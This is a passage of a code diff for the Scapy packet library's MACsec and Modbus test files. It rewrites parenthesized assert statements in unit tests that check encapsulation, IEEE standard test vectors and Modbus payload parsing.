Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 45 + "y") m = sa.encap(p) -assert(m[MACsec].shortlen == 0) +assert m[MACsec].shortlen == 0 = MACsec - encap - shortlen 2/nosci sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=0) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd') m = sa.encap(p) -assert(m[MACsec].shortlen == 2) -assert(len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0)) +assert m[MACsec].shortlen == 2 +assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 32/nosci sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=0) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 30) m = sa.encap(p) -assert(m[MACsec].shortlen == 32) -assert(len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0)) +assert m[MACsec].shortlen == 32 +assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 47/nosci sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=0) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 45) m = sa.encap(p) -assert(m[MACsec].shortlen == 47) -assert(len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0)) +assert m[MACsec].shortlen == 47 +assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) = MACsec - authenticate @@ -206,8 +206,8 @@ txdec = txsa.decap(txsa.decrypt(tx)) rxdec = rxsa.decap(rxsa.decrypt(rx)) txref = b"RT\x00\x12\x01V.\xbc\x84\xd5\xca\x13\x08\x00E\x00\x00T\x11:@\x00@\x01\xa6\x1b\xc0\xa8\x01\x01\xc0\xa8\x01\x02\x08\x00a\xeaG+\x00\x01\xc0~RY\x00\x00\x00\x00w>\x06\x00\x00\x00\x00\x00\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37" rxref = b".\xbc\x84\xd5\xca\x13RT\x00\x12\x01V\x08\x00E\x00\x00T\xd4\x1a\x00\x00@\x01#;\xc0\xa8\x01\x02\xc0\xa8\x01\x01\x00\x00i\xeaG+\x00\x01\xc0~RY\x00\x00\x00\x00w>\x06\x00\x00\x00\x00\x00\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37" -assert(raw(txdec) == raw(txref)) -assert(raw(rxdec) == raw(rxref)) +assert raw(txdec) == raw(txref) +assert raw(rxdec) == raw(rxref) @@ -216,7 +216,7 @@ rx = Ether(b".\xbc\x84\xd5\xca\x13RT\x00\x12\x01V\x88\xe5 \x00\x00\x00\x00#RT\x0 txsa = MACsecSA(sci=0x5254001301560001, an=0, pn=31, key=b'\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61', icvlen=16, encrypt=0, send_sci=1) try: rxdec = rxsa.decap(rxsa.decrypt(rx)) - assert(not "This packet shouldn't have been authenticated as correct") + assert not "This packet shouldn't have been authenticated as correct" except InvalidTag: pass @@ -231,8 +231,8 @@ txdec = txsa.decap(txsa.decrypt(tx)) rxdec = rxsa.decap(rxsa.decrypt(rx)) txref = b"RT\x00\x12\x01V.\xbc\x84\xd5\xca\x13\x08\x00E\x00\x00\x80#D@\x00@\x01\x93\xe5\xc0\xa8\x01\x01\xc0\xa8\x01\x02\x08\x00E\xd5\x0f\xb3\x00\x01SrSY\x00\x00\x00\x00\x8b\x1d\r\x00\x00\x00\x00\x00\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc" rxref = b".\xbc\x84\xd5\xca\x13RT\x00\x12\x01V\x08\x00E\x00\x00\x80\x05\xab\x00\x00@\x01\xf1~\xc0\xa8\x01\x02\xc0\xa8\x01\x01\x00\x00M\xd5\x0f\xb3\x00\x01SrSY\x00\x00\x00\x00\x8b\x1d\r\x00\x00\x00\x00\x00\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc" -assert(raw(txdec) == raw(txref)) -assert(raw(rxdec) == raw(rxref)) +assert raw(txdec) == raw(txref) +assert raw(rxdec) == raw(rxref) @@ -241,7 +241,7 @@ rx = Ether(b".\xbc\x84\xd5\xca\x13RT\x00\x12\x01V\x88\xe5,\x00\x00\x00\x005RT\x0 rxsa = MACsecSA(sci=0x5254001201560001, an=0, pn=31, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=1, send_sci=1) try: rxdec = rxsa.decap(rxsa.decrypt(rx)) - assert(not "This packet shouldn't have been decrypted correctly") + assert not "This packet shouldn't have been decrypted correctly" except InvalidTag: pass @@ -252,21 +252,21 @@ rxsa = MACsecSA(sci=0x5254001201560001, an=0, pn=31, key=b'aaaaaaaaaaaaaaaa', ic try: rxsa.decap(IP()) except TypeError as e: - assert(str(e) == "cannot decapsulate MACsec packet, must be Ethernet/MACsec") + assert str(e) == "cannot decapsulate MACsec packet, must be Ethernet/MACsec" = MACsec - decap - non-MACsec rxsa = MACsecSA(sci=0x5254001201560001, an=0, pn=31, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=1, send_sci=1) try: rxsa.decap(Ether()/IP()) except TypeError as e: - assert(str(e) == "cannot decapsulate MACsec packet, must be Ethernet/MACsec") + assert str(e) == "cannot decapsulate MACsec packet, must be Ethernet/MACsec" = MACsec - encap - non-Ethernet txsa = MACsecSA(sci=0x5254001201560001, an=0, pn=31, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=1, send_sci=1) try: txsa.encap(IP()) except TypeError as e: - assert(str(e) == "cannot encapsulate packet in MACsec, must be Ethernet") + assert str(e) == "cannot encapsulate packet in MACsec, must be Ethernet" # Reference packets tests from the MACsec specification document (IEEE Std 802.1AEbw-2013, Annex C). @@ -277,48 +277,48 @@ sa = MACsecSA(sci=b'\x12\x15\x35\x24\xC0\x89\x5E\x81', an=2, pn=0xB2C28465, key= p = Ether(src='7A:0D:46:DF:99:8D', dst='D6:09:B1:F0:56:63', type=0x0800)/Raw(bytes(bytearray.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001"))) m = sa.encap(p) iv = sa.make_iv(m) -assert(raw(iv) == raw(b'\x12\x15\x35\x24\xC0\x89\x5E\x81\xB2\xC2\x84\x65')) +assert raw(iv) == raw(b'\x12\x15\x35\x24\xC0\x89\x5E\x81\xB2\xC2\x84\x65') e = sa.encrypt(m) ref = Raw(bytes(bytearray.fromhex("D609B1F056637A0D46DF998D88E5222AB2C2846512153524C0895E8108000F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001F09478A9B09007D06F46E9B6A1DA25DD"))) -assert(raw(e) == raw(ref)) +assert raw(e) == raw(ref) dt = sa.decrypt(e) -assert(raw(dt) == raw(m)) +assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.1.2 GCM-AES-256 (54-octet frame integrity protection) sa = MACsecSA(sci=b'\x12\x15\x35\x24\xC0\x89\x5E\x81', an=2, pn=0xB2C28465, key=b'\xE3\xC0\x8A\x8F\x06\xC6\xE3\xAD\x95\xA7\x05\x57\xB2\x3F\x75\x48\x3C\xE3\x30\x21\xA9\xC7\x2B\x70\x25\x66\x62\x04\xC6\x9C\x0B\x72', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='7A:0D:46:DF:99:8D', dst='D6:09:B1:F0:56:63', type=0x0800)/Raw(bytes(bytearray.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001"))) m = sa.encap(p) iv = sa.make_iv(m) -assert(raw(iv) == raw(b'\x12\x15\x35\x24\xC0\x89\x5E\x81\xB2\xC2\x84\x65')) +assert raw(iv) == raw(b'\x12\x15\x35\x24\xC0\x89\x5E\x81\xB2\xC2\x84\x65') e = sa.encrypt(m) ref = Raw(bytes(bytearray.fromhex("D609B1F056637A0D46DF998D88E5222AB2C2846512153524C0895E8108000F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333400012F0BC5AF409E06D609EA8B7D0FA5EA50"))) -assert(raw(e) == raw(ref)) +assert raw(e) == raw(ref) dt = sa.decrypt(e) -assert(raw(dt) == raw(m)) +assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.1.3 GCM-AES-XPN-128 (54-octet frame integrity protection) sa = MACsecSA(sci=b'\x12\x15\x35\x24\xC0\x89\x5E\x81', an=2, pn=0xB0DF459CB2C28465, key=b'\xAD\x7A\x2B\xD0\x3E\xAC\x83\x5A\x6F\x62\x0F\xDC\xB5\x06\xB3\x45', icvlen=16, encrypt=0, send_sci=1, xpn_en = True, ssci = 0x7A30C118, salt = b'\xE6\x30\xE8\x1A\x48\xDE\x86\xA2\x1C\x66\xFA\x6D') p = Ether(src='7A:0D:46:DF:99:8D', dst='D6:09:B1:F0:56:63', type=0x0800)/Raw(bytes(bytearray.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001"))) m = sa.encap(p) iv = sa.make_iv(m) -assert(raw(iv) == raw(b'\x9C\x00\x29\x02\xF8\x01\xC3\x3E\xAE\xA4\x7E\x08')) +assert raw(iv) == raw(b'\x9C\x00\x29\x02\xF8\x01\xC3\x3E\xAE\xA4\x7E\x08') e = sa.encrypt(m) ref = Raw(bytes(bytearray.fromhex("D609B1F056637A0D46DF998D88E5222AB2C2846512153524C0895E8108000F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F3031323334000117FE1981EBDD4AFC5062697E8BAA0C23"))) -assert(raw(e) == raw(ref)) +assert raw(e) == raw(ref) dt = sa.decrypt(e) -assert(raw(dt) == raw(m)) +assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.1.4 GCM-AES-XPN-256 (54-octet frame integrity protection) sa = MACsecSA(sci=b'\x12\x15\x35\x24\xC0\x89\x5E\x81', an=2, pn=0xB0DF459CB2C28465, key=b'\xE3\xC0\x8A\x8F\x06\xC6\xE3\xAD\x95\xA7\x05\x57\xB2\x3F\x75\x48\x3C\xE3\x30\x21\xA9\xC7\x2B\x70\x25\x66\x62\x04\xC6\x9C\x0B\x72', icvlen=16, encrypt=0, send_sci=1, xpn_en = True, ssci = 0x7A30C118, salt = b'\xE6\x30\xE8\x1A\x48\xDE\x86\xA2\x1C\x66\xFA\x6D') p = Ether(src='7A:0D:46:DF:99:8D', dst='D6:09:B1:F0:56:63', type=0x0800)/Raw(bytes(bytearray.fromhex("0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F30313233340001"))) m = sa.encap(p) iv = sa.make_iv(m) -assert(raw(iv) == raw(b'\x9C\x00\x29\x02\xF8\x01\xC3\x3E\xAE\xA4\x7E\x08')) +assert raw(iv) == raw(b'\x9C\x00\x29\x02\xF8\x01\xC3\x3E\xAE\xA4\x7E\x08') e = sa.encrypt(m) ref = Raw(bytes(bytearray.fromhex("D609B1F056637A0D46DF998D88E5222AB2C2846512153524C0895E8108000F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333400014DBD2F6A754A6CF728CC129BA6931577"))) -assert(raw(e) == raw(ref)) +assert raw(e) == raw(ref) dt = sa.decrypt(e) -assert(raw(dt) == raw(m)) +assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.5.1 GCM-AES-128 (54-octet frame confidentiality protection) sa = MACsecSA(sci=b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01', an=0, pn=0x76D457ED, key=b'\x07\x1B\x11\x3B\x0C\xA7\x43\xFE\xCC\xCF\x3D\x05\x1F\x73\x73\x82', icvlen=16, encrypt=1, send_sci=0) @@ -326,12 +326,12 @@ p = Ether(src='F0:76:1E:8D:CD:3D', dst='E2:01:06:D7:CD:0D', type=0x0800)/Raw(byt m = sa.encap(p) m[MACsec].ES = 1 iv = sa.make_iv(m) -assert(raw(iv) == raw(b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01\x76\xD4\x57\xED')) +assert raw(iv) == raw(b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01\x76\xD4\x57\xED') e = sa.encrypt(m) ref = Raw(bytes(bytearray.fromhex("E20106D7CD0DF0761E8DCD3D88E54C2A76D457ED13B4C72B389DC5018E72A171DD85A5D3752274D3A019FBCAED09A425CD9B2E1C9B72EEE7C9DE7D52B3F3D6A5284F4A6D3FE22A5D6C2B960494C3"))) -assert(raw(e) == raw(ref)) +assert raw(e) == raw(ref) dt = sa.decrypt(e) -assert(raw(dt) == raw(m)) +assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.5.2 GCM-AES-256 (54-octet frame confidentiality protection) sa = MACsecSA(sci=b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01', an=0, pn=0x76D457ED, key=b'\x69\x1D\x3E\xE9\x09\xD7\xF5\x41\x67\xFD\x1C\xA0\xB5\xD7\x69\x08\x1F\x2B\xDE\x1A\xEE\x65\x5F\xDB\xAB\x80\xBD\x52\x95\xAE\x6B\xE7', icvlen=16, encrypt=1, send_sci=0) @@ -339,12 +339,12 @@ p = Ether(src='F0:76:1E:8D:CD:3D', dst='E2:01:06:D7:CD:0D', type=0x0800)/Raw(byt m = sa.encap(p) m[MACsec].ES = 1 iv = sa.make_iv(m) -assert(raw(iv) == raw(b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01\x76\xD4\x57\xED')) +assert raw(iv) == raw(b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01\x76\xD4\x57\xED') e = sa.encrypt(m) ref = Raw(bytes(bytearray.fromhex("E20106D7CD0DF0761E8DCD3D88E54C2A76D457EDC1623F55730C93533097ADDAD25664966125352B43ADACBD61C5EF3AC90B5BEE929CE4630EA79F6CE51912AF39C2D1FDC2051F8B7B3C9D397EF2"))) -assert(raw(e) == raw(ref)) +assert raw(e) == raw(ref) dt = sa.decrypt(e) -assert(raw(dt) == raw(m)) +assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.5.3 GCM-AES-XPN-128 (54-octet frame confidentiality protection) sa = MACsecSA(sci=b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01', an=0, pn=0xB0DF459C76D457ED, key=b'\x07\x1B\x11\x3B\x0C\xA7\x43\xFE\xCC\xCF\x3D\x05\x1F\x73\x73\x82', icvlen=16, encrypt=1, send_sci=0, xpn_en = True, ssci = 0x7A30C118, salt = b'\xE6\x30\xE8\x1A\x48\xDE\x86\xA2\x1C\x66\xFA\x6D') @@ -352,12 +352,12 @@ p = Ether(src='F0:76:1E:8D:CD:3D', dst='E2:01:06:D7:CD:0D', type=0x0800)/Raw(byt m = sa.encap(p) m[MACsec].ES = 1 iv = sa.make_iv(m) -assert(raw(iv) == raw(b'\x9C\x00\x29\x02\xF8\x01\xC3\x3E\x6A\xB2\xAD\x80')) +assert raw(iv) == raw(b'\x9C\x00\x29\x02\xF8\x01\xC3\x3E\x6A\xB2\xAD\x80') e = sa.encrypt(m) ref = Raw(bytes(bytearray.fromhex("E20106D7CD0DF0761E8DCD3D88E54C2A76D457ED9CA46984430203ED416EBDC2FE2622BA3E5EAB6961C36383009E187E9B0C88564653B9ABD216441C6AB6F0A232E9E44C978CF7CD84D43484D101"))) -assert(raw(e) == raw(ref)) +assert raw(e) == raw(ref) dt = sa.decrypt(e) -assert(raw(dt) == raw(m)) +assert raw(dt) == raw(m) = MACsec - Standard Test Vectors - C.5.4 GCM-AES-XPN-256 (54-octet frame confidentiality protection) sa = MACsecSA(sci=b'\xF0\x76\x1E\x8D\xCD\x3D\x00\x01', an=0, pn=0xB0DF459C76D457ED, key=b'\x69\x1D\x3E\xE9\x09\xD7\xF5\x41\x67\xFD\x1C\xA0\xB5\xD7\x69\x08\x1F\x2B\xDE\x1A\xEE\x65\x5F\xDB\xAB\x80\xBD\x52\x95\xAE\x6B\xE7', icvlen=16, encrypt=1, send_sci=0, xpn_en = True, ssci = 0x7A30C118, salt = b'\xE6\x30\xE8\x1A\x48\xDE\x86\xA2\x1C\x66\xFA\x6D') @@ -365,9 +365,9 @@ p = Ether(src='F0:76:1E:8D:CD:3D', dst='E2:01:06:D7:CD:0D', type=0x0800)/Raw(byt m = sa.encap(p) m[MACsec].ES = 1 iv = sa.make_iv(m) -assert(raw(iv) == raw(b'\x9C\x00\x29\x02\xF8\x01\xC3\x3E\x6A\xB2\xAD\x80')) +assert raw(iv) == raw(b'\x9C\x00\x29\x02\xF8\x01\xC3\x3E\x6A\xB2\xAD\x80') e = sa.encrypt(m) ref = Raw(bytes(bytearray.fromhex("E20106D7CD0DF0761E8DCD3D88E54C2A76D457ED88D9F7D1F1578EE34BA7B1ABC89893EF1D3398C9F1DD3E47FBD8553E0FF786EF5699EB01EA10420D0EBD39A0E273C4C7F95ED843207D7A497DFA"))) -assert(raw(e) == raw(ref)) +assert raw(e) == raw(ref) dt = sa.decrypt(e) -assert(raw(dt) == raw(m)) +assert raw(dt) == raw(m) diff --git a/test/contrib/modbus.uts b/test/contrib/modbus.uts index 4809921a539..a65b2532aaa 100644 --- a/test/contrib/modbus.uts +++ b/test/contrib/modbus.uts @@ -13,213 +13,213 @@ raw(ModbusADURequest() / b'\x00\x01\x02') == b'\x00\x00\x00\x00\x00\x04\xff\x00\ = MBAP Guess Payload ModbusPDU01ReadCoilsRequest (simple case) p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x01\x00\x00\x00\x01') -assert(isinstance(p.payload, ModbusPDU01ReadCoilsRequest)) +assert isinstance(p.payload, ModbusPDU01ReadCoilsRequest) = MBAP Guess Payload ModbusPDU01ReadCoilsResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x04\xff\x01\x01\x01') -assert(isinstance(p.payload, ModbusPDU01ReadCoilsResponse)) +assert isinstance(p.payload, ModbusPDU01ReadCoilsResponse) = MBAP Guess Payload ModbusPDU01ReadCoilsError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x81\x02') -assert(isinstance(p.payload, ModbusPDU01ReadCoilsError)) +assert isinstance(p.payload, ModbusPDU01ReadCoilsError) = MBAP Guess Payload ModbusPDU02ReadDiscreteInputsRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x02\x00\x00\x00\x01') -assert(isinstance(p.payload, ModbusPDU02ReadDiscreteInputsRequest)) +assert isinstance(p.payload, ModbusPDU02ReadDiscreteInputsRequest) = MBAP Guess Payload ModbusPDU02ReadDiscreteInputsResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x04\xff\x02\x01\x00') -assert(isinstance(p.payload, ModbusPDU02ReadDiscreteInputsResponse)) +assert isinstance(p.payload, ModbusPDU02ReadDiscreteInputsResponse) = MBAP Guess Payload ModbusPDU02ReadDiscreteInputsError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x82\x01') -assert(isinstance(p.payload, ModbusPDU02ReadDiscreteInputsError)) +assert isinstance(p.payload, ModbusPDU02ReadDiscreteInputsError) = MBAP Guess Payload ModbusPDU03ReadHoldingRegistersRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x03\x00\x00\x00\x01') -assert(isinstance(p.payload, ModbusPDU03ReadHoldingRegistersRequest)) +assert isinstance(p.payload, ModbusPDU03ReadHoldingRegistersRequest) = MBAP Guess Payload ModbusPDU03ReadHoldingRegistersResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x05\xff\x03\x02\x00\x00') -assert(isinstance(p.payload, ModbusPDU03ReadHoldingRegistersResponse)) +assert isinstance(p.payload, ModbusPDU03ReadHoldingRegistersResponse) = MBAP Guess Payload ModbusPDU03ReadHoldingRegistersError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x83\x01') -assert(isinstance(p.payload, ModbusPDU03ReadHoldingRegistersError)) +assert isinstance(p.payload, ModbusPDU03ReadHoldingRegistersError) = MBAP Guess Payload ModbusPDU04ReadInputRegistersRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x04\x00\x00\x00\x01') -assert(isinstance(p.payload, ModbusPDU04ReadInputRegistersRequest)) +assert isinstance(p.payload, ModbusPDU04ReadInputRegistersRequest) = MBAP Guess Payload ModbusPDU04ReadInputRegistersResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x05\xff\x04\x02\x00\x00') -assert(isinstance(p.payload, ModbusPDU04ReadInputRegistersResponse)) +assert isinstance(p.payload, ModbusPDU04ReadInputRegistersResponse) = MBAP Guess Payload ModbusPDU04ReadInputRegistersError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x84\x01') -assert(isinstance(p.payload, ModbusPDU04ReadInputRegistersError)) +assert isinstance(p.payload, ModbusPDU04ReadInputRegistersError) = MBAP Guess Payload ModbusPDU05WriteSingleCoilRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x05\x00\x00\x00\x00') -assert(isinstance(p.payload, ModbusPDU05WriteSingleCoilRequest)) +assert isinstance(p.payload, ModbusPDU05WriteSingleCoilRequest) = MBAP Guess Payload ModbusPDU05WriteSingleCoilResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x05\x00\x00\x00\x00') -assert(isinstance(p.payload, ModbusPDU05WriteSingleCoilResponse)) +assert isinstance(p.payload, ModbusPDU05WriteSingleCoilResponse) = MBAP Guess Payload ModbusPDU05WriteSingleCoilError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x85\x01') -assert(isinstance(p.payload, ModbusPDU05WriteSingleCoilError)) +assert isinstance(p.payload, ModbusPDU05WriteSingleCoilError) = MBAP Guess Payload ModbusPDU06WriteSingleRegisterRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x06\x00\x00\x00\x00') -assert(isinstance(p.payload, ModbusPDU06WriteSingleRegisterRequest)) +assert isinstance(p.payload, ModbusPDU06WriteSingleRegisterRequest) = MBAP Guess Payload ModbusPDU06WriteSingleRegisterResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x06\x00\x00\x00\x00') -assert(isinstance(p.payload, ModbusPDU06WriteSingleRegisterResponse)) +assert isinstance(p.payload, ModbusPDU06WriteSingleRegisterResponse) = MBAP Guess Payload ModbusPDU06WriteSingleRegisterError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x86\x01') -assert(isinstance(p.payload, ModbusPDU06WriteSingleRegisterError)) +assert isinstance(p.payload, ModbusPDU06WriteSingleRegisterError) = MBAP Guess Payload ModbusPDU07ReadExceptionStatusRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x02\xff\x07') -assert(isinstance(p.payload, ModbusPDU07ReadExceptionStatusRequest)) +assert isinstance(p.payload, ModbusPDU07ReadExceptionStatusRequest) = MBAP Guess Payload ModbusPDU07ReadExceptionStatusResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x07\x00') -assert(isinstance(p.payload, ModbusPDU07ReadExceptionStatusResponse)) +assert isinstance(p.payload, ModbusPDU07ReadExceptionStatusResponse) = MBAP Guess Payload ModbusPDU07ReadExceptionStatusError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x87\x01') -assert(isinstance(p.payload, ModbusPDU07ReadExceptionStatusError)) +assert isinstance(p.payload, ModbusPDU07ReadExceptionStatusError) = MBAP Guess Payload ModbusPDU08DiagnosticsRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x06\xff\x08\x00\x00\x00\x00') -assert(isinstance(p.payload, ModbusPDU08DiagnosticsRequest)) +assert isinstance(p.payload, ModbusPDU08DiagnosticsRequest) = MBAP Guess Payload ModbusPDU08DiagnosticsResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x08\x00\x00\x00\x00') -assert(isinstance(p.payload, ModbusPDU08DiagnosticsResponse)) +assert isinstance(p.payload, ModbusPDU08DiagnosticsResponse) = MBAP Guess Payload ModbusPDU08DiagnosticsError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x88\x01') -assert(isinstance(p.payload, ModbusPDU08DiagnosticsError)) +assert isinstance(p.payload, ModbusPDU08DiagnosticsError) = MBAP Guess Payload ModbusPDU0BGetCommEventCounterRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x02\xff\x0b') -assert(isinstance(p.payload, ModbusPDU0BGetCommEventCounterRequest)) +assert isinstance(p.payload, ModbusPDU0BGetCommEventCounterRequest) = MBAP Guess Payload ModbusPDU0BGetCommEventCounterResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x0b\x00\x00\xff\xff') -assert(isinstance(p.payload, ModbusPDU0BGetCommEventCounterResponse)) +assert isinstance(p.payload, ModbusPDU0BGetCommEventCounterResponse) = MBAP Guess Payload ModbusPDU0BGetCommEventCounterError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x8b\x01') -assert(isinstance(p.payload, ModbusPDU0BGetCommEventCounterError)) +assert isinstance(p.payload, ModbusPDU0BGetCommEventCounterError) = MBAP Guess Payload ModbusPDU0CGetCommEventLogRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x02\xff\x0c') -assert(isinstance(p.payload, ModbusPDU0CGetCommEventLogRequest)) +assert isinstance(p.payload, ModbusPDU0CGetCommEventLogRequest) = MBAP Guess Payload ModbusPDU0CGetCommEventLogResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x02\xff\x0c') -assert(isinstance(p.payload, ModbusPDU0CGetCommEventLogResponse)) +assert isinstance(p.payload, ModbusPDU0CGetCommEventLogResponse) = MBAP Guess Payload ModbusPDU0CGetCommEventLogError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x8c\x01') -assert(isinstance(p.payload, ModbusPDU0CGetCommEventLogError)) +assert isinstance(p.payload, ModbusPDU0CGetCommEventLogError) = MBAP Guess Payload ModbusPDU0FWriteMultipleCoilsRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x08\xff\x0f\x00\x00\x00\x01\x01\x00') -assert(isinstance(p.payload, ModbusPDU0FWriteMultipleCoilsRequest)) +assert isinstance(p.payload, ModbusPDU0FWriteMultipleCoilsRequest) = MBAP Guess Payload ModbusPDU0FWriteMultipleCoilsResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x0f\x00\x00\x00\x01') -assert(isinstance(p.payload, ModbusPDU0FWriteMultipleCoilsResponse)) +assert isinstance(p.payload, ModbusPDU0FWriteMultipleCoilsResponse) = MBAP Guess Payload ModbusPDU0FWriteMultipleCoilsError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x8f\x01') -assert(isinstance(p.payload, ModbusPDU0FWriteMultipleCoilsError)) +assert isinstance(p.payload, ModbusPDU0FWriteMultipleCoilsError) = MBAP Guess Payload ModbusPDU10WriteMultipleRegistersRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\t\xff\x10\x00\x00\x00\x01\x02\x00\x00') -assert(isinstance(p.payload, ModbusPDU10WriteMultipleRegistersRequest)) +assert isinstance(p.payload, ModbusPDU10WriteMultipleRegistersRequest) = MBAP Guess Payload ModbusPDU10WriteMultipleRegistersResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x06\xff\x10\x00\x00\x00\x01') -assert(isinstance(p.payload, ModbusPDU10WriteMultipleRegistersResponse)) +assert isinstance(p.payload, ModbusPDU10WriteMultipleRegistersResponse) = MBAP Guess Payload ModbusPDU10WriteMultipleRegistersError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x90\x01') -assert(isinstance(p.payload, ModbusPDU10WriteMultipleRegistersError)) +assert isinstance(p.payload, ModbusPDU10WriteMultipleRegistersError) = MBAP Guess Payload ModbusPDU11ReportSlaveIdRequest p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x02\xff\x11') -assert(isinstance(p.payload, ModbusPDU11ReportSlaveIdRequest)) +assert isinstance(p.payload, ModbusPDU11ReportSlaveIdRequest) = MBAP Guess Payload ModbusPDU11ReportSlaveIdResponse p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x11\x00') -assert(isinstance(p.payload, ModbusPDU11ReportSlaveIdResponse)) +assert isinstance(p.payload, ModbusPDU11ReportSlaveIdResponse) = MBAP Guess Payload ModbusPDU11ReportSlaveIdError p = 